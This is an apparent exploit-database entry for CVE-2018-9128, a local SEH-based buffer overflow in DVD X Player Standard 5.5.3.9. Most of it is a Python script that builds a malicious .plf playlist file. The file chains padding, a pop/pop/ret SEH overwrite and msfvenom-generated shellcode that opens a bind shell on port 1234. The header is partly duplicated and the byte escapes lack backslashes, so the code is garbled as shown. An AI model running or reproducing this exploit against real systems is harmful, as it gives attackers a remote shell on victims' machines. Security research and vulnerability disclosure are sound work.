DVD X Player Standard 5.5.3.9 Buffer Overflow

######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.co ######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-
# Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################

# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "x00x0ax0dx1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes


file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
buffer = "x41" * 608
next_seh = "xebx06x90x90"
seh = "xBCx13x5Fx02" # pop/pop/ret : EchoDelayProcess.dll
nops = "x90" * 100

buf = ""
buf += "xdaxd4xd9x74x24xf4xb8xb3xb9xc8xaex5ax31"
buf += "xc9xb1x53x83xc2x04x31x42x13x03xf1xaax2a"
buf += "x5bx09x24x28xa4xf1xb5x4dx2cx14x84x4dx4a"
buf += "x5dxb7x7dx18x33x34xf5x4cxa7xcfx7bx59xc8"
buf += "x78x31xbfxe7x79x6ax83x66xfax71xd0x48xc3"
buf += "xb9x25x89x04xa7xc4xdbxddxa3x7bxcbx6axf9"
buf += "x47x60x20xefxcfx95xf1x0exe1x08x89x48x21"
buf += "xabx5exe1x68xb3x83xccx23x48x77xbaxb5x98"
buf += "x49x43x19xe5x65xb6x63x22x41x29x16x5axb1"
buf += "xd4x21x99xcbx02xa7x39x6bxc0x1fxe5x8dx05"
buf += "xf9x6ex81xe2x8dx28x86xf5x42x43xb2x7ex65"
buf += "x83x32xc4x42x07x1ex9exebx1exfax71x13x40"
buf += "xa5x2exb1x0bx48x3axc8x56x05x8fxe1x68xd5"
buf += "x87x72x1bxe7x08x29xb3x4bxc0xf7x44xabxfb"
buf += "x40xdax52x04xb1xf3x90x50xe1x6bx30xd9x6a"
buf += "x6bxbdx0cx06x63x18xffx35x8exdaxafxf9x20"
buf += "xb3xa5xf5x1fxa3xc5xdfx08x4cx38xe0x32x5f"
buf += "xb5x06x50x4fx90x91xccxadxc7x29x6bxcdx2d"
buf += "x02x1bx86x27x95x24x17x62xb1xb2x9cx61x05"
buf += "xa3xa2xafx2dxb4x35x25xbcxf7xa4x3ax95x6f"
buf += "x44xa8x72x6fx03xd1x2cx38x44x27x25xacx78"
buf += "x1ex9fxd2x80xc6xd8x56x5fx3bxe6x57x12x07"
buf += "xccx47xeax88x48x33xa2xdex06xedx04x89xe8"
buf += "x47xdfx66xa3x0fxa6x44x74x49xa7x80x02xb5"
buf += "x16x7dx53xcax97xe9x53xb3xc5x89x9cx6ex4e"
buf += "xb7x6dxa2x5bx20xd4x57x26x2cxe7x82x65x49"
buf += "x64x26x16xaex74x43x13xeax32xb8x69x63xd7"
buf += "xbexdex84xf2"

file.write(buffer + next_seh + seh + nops + buf)
file.close()